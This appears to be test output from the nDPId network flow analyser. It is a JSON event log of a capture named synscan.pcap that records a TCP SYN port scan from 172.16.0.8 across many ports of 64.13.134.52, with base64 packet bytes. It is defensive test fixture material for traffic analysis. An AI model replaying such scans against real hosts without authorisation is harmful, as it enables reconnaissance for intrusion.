-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspaIAACwGdtCsEAAIQA2GNIzSF2TdUoMYAAAAAGACBAAdKwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAswhQAADEGVV6sEAAIQA2GNIzSBP3dUoMYAAAAAGACCAArkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsL3kAADQG5PmsEAAIQA2GNIzSCE7dUoMYAAAAAGACBAAsQQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsCL0AADsGBLasEAAIQA2GNIzSBMDdUoMYAAAAAGACEAAjzwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsWKoAADoGtcisEAAIQA2GNIzSI4PdUoMYAAAAAGACDAAJDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5noAACsGNvisEAAIQA2GNIzSBa\/dUoMYAAAAAGACEAAi4AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAshFYAACUGnxysEAAIQA2GNIzSA\/HdUoMYAAAAAGACCAAsngAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAset0AACcGppWsEAAIQA2GNIzSJxHdUoMYAAAAAGACEAABfgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsAccAACkGHaysEAAIQA2GNIzSIGTdUoMYAAAAAGACCAAQKwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5RsAACYGPVesEAAIQA2GNIzS2TDdUoMYAAAAAGACDABTXgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsSPQAADYGyX6sEAAIQA2GNIzSTiXdUoMYAAAAAGACDADeaQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswj8AAC4GWDOsEAAIQA2GNIzSBAzdUoMYAAAAAGACDAAogwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQjcAACgG3jusEAAIQA2GNIzSF9rdUoMYAAAAAGACBAActQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs9woAADcGGmisEAAIQA2GNIzSHCHdUoMYAAAAAGACEAAMbgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/ToAADsGEDisEAAIQA2GNIzSBB3dUoMYAAAAAGACEAAkcgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgcAACoGcGusEAAIQA2GNIzSgAbdUoMYAAAAAGACDACsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsKF4AAC0G8xSsEAAIQA2GNIzSC7bdUoMYAAAAAGACCAAk2QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAszEUAADsGQS2sEAAIQA2GNIzSB\/\/dUoMYAAAAAGACEAAgkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsezgAADMGmjqsEAAIQA2GNIzSIAjdUoMYAAAAAGACEAAIhwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswn0AACsGWvWsEAAIQA2GNIzSA3jdUoMYAAAAAGACEAAlFwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAso9kAAC8GdZmsEAAIQA2GNIzShwzdUoMYAAAAAGACEAChggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAACcGzvisEAAIQA2GNIzSBLHdUoMYAAAAAGACEAAj3gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs7YEAADYGJPGsEAAIQA2GNIzSIyvdUoMYAAAAAGACDAAJZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsph0AACwGdlWsEAAIQA2GNIzSDSfdUoMYAAAAAGACBAAnaAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsJeMAADAG8o+sEAAIQA2GNIzSCJTdUoMYAAAAAGACBAAr+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 